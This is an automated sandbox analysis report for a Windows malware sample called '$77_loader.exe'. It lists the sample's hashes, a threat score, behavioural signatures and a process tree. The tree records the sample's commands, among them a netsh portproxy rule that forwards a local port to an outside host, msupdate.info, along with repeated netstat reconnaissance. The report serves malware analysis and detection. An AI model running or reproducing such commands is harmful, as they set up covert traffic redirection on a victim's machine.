Resubmissions
29-12-2021 11:50
211229-nz3vsaddbl 829-12-2021 11:29
211229-nlssnaddak 1028-12-2021 17:00
211228-vh1sescfan 10Analysis
-
max time kernel
30s -
max time network
29s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
29-12-2021 11:50
Static task
static1
Behavioral task
behavioral1
Sample
tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Resource
win7-en-20211208
0 signatures
0 seconds
General
-
Target
tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
-
Size
397KB
-
MD5
aff57ee1a4f3731c2036046910f78fb4
-
SHA1
ef9627c0cadff85a3dfaab6aef0b7c885f03b186
-
SHA256
3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
-
SHA512
5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f
Score
8/10
Malware Config
Signatures
-
Sets file execution options in registry 2 TTPs
-
Modifies powershell logging option 1 TTPs
-
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\SoftwareDistribution\config.xml fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe File opened for modification C:\Windows\SoftwareDistribution\config.xml fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe -
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
pid Process 1608 NETSTAT.EXE 1292 NETSTAT.EXE 1728 NETSTAT.EXE 580 NETSTAT.EXE 1736 NETSTAT.EXE 2012 NETSTAT.EXE -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 832 taskmgr.exe 832 taskmgr.exe 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 832 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 832 taskmgr.exe Token: SeDebugPrivilege 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe Token: SeRestorePrivilege 1876 msiexec.exe Token: SeTakeOwnershipPrivilege 1876 msiexec.exe Token: SeSecurityPrivilege 1876 msiexec.exe Token: SeDebugPrivilege 1292 NETSTAT.EXE Token: SeDebugPrivilege 1728 NETSTAT.EXE Token: SeDebugPrivilege 580 NETSTAT.EXE Token: SeDebugPrivilege 1736 NETSTAT.EXE Token: SeDebugPrivilege 2012 NETSTAT.EXE Token: SeDebugPrivilege 1608 NETSTAT.EXE -
Suspicious use of FindShellTrayWindow 42 IoCs
pid Process 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe -
Suspicious use of SendNotifyMessage 42 IoCs
pid Process 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe 832 taskmgr.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 1648 wrote to memory of 564 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 28 PID 1648 wrote to memory of 564 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 28 PID 1648 wrote to memory of 564 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 28 PID 564 wrote to memory of 1100 564 csc.exe 30 PID 564 wrote to memory of 1100 564 csc.exe 30 PID 564 wrote to memory of 1100 564 csc.exe 30 PID 1648 wrote to memory of 336 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 32 PID 1648 wrote to memory of 336 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 32 PID 1648 wrote to memory of 336 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 32 PID 1648 wrote to memory of 780 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 35 PID 1648 wrote to memory of 780 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 35 PID 1648 wrote to memory of 780 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 35 PID 1648 wrote to memory of 1292 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 36 PID 1648 wrote to memory of 1292 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 36 PID 1648 wrote to memory of 1292 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 36 PID 1648 wrote to memory of 1728 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 37 PID 1648 wrote to memory of 1728 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 37 PID 1648 wrote to memory of 1728 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 37 PID 1648 wrote to memory of 580 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 38 PID 1648 wrote to memory of 580 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 38 PID 1648 wrote to memory of 580 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 38 PID 1648 wrote to memory of 1932 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 39 PID 1648 wrote to memory of 1932 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 39 PID 1648 wrote to memory of 1932 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 39 PID 1648 wrote to memory of 1444 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 40 PID 1648 wrote to memory of 1444 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 40 PID 1648 wrote to memory of 1444 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 40 PID 1648 wrote to memory of 1604 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 41 PID 1648 wrote to memory of 1604 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 41 PID 1648 wrote to memory of 1604 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 41 PID 1648 wrote to memory of 668 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 42 PID 1648 wrote to memory of 668 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 42 PID 1648 wrote to memory of 668 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 42 PID 1648 wrote to memory of 808 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 43 PID 1648 wrote to memory of 808 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 43 PID 1648 wrote to memory of 808 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 43 PID 1648 wrote to memory of 1736 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 44 PID 1648 wrote to memory of 1736 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 44 PID 1648 wrote to memory of 1736 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 44 PID 1648 wrote to memory of 2012 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 45 PID 1648 wrote to memory of 2012 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 45 PID 1648 wrote to memory of 2012 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 45 PID 1648 wrote to memory of 1608 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 47 PID 1648 wrote to memory of 1608 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 47 PID 1648 wrote to memory of 1608 1648 fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hk_aks02.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES198A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC197A.tmp"3⤵PID:1100
-
-
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 4372⤵PID:336
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:780
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy reset2⤵PID:1932
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:1444
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info2⤵PID:1604
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:668
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵PID:808
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:832
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" SYSTEM1⤵PID:892
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵PID:1076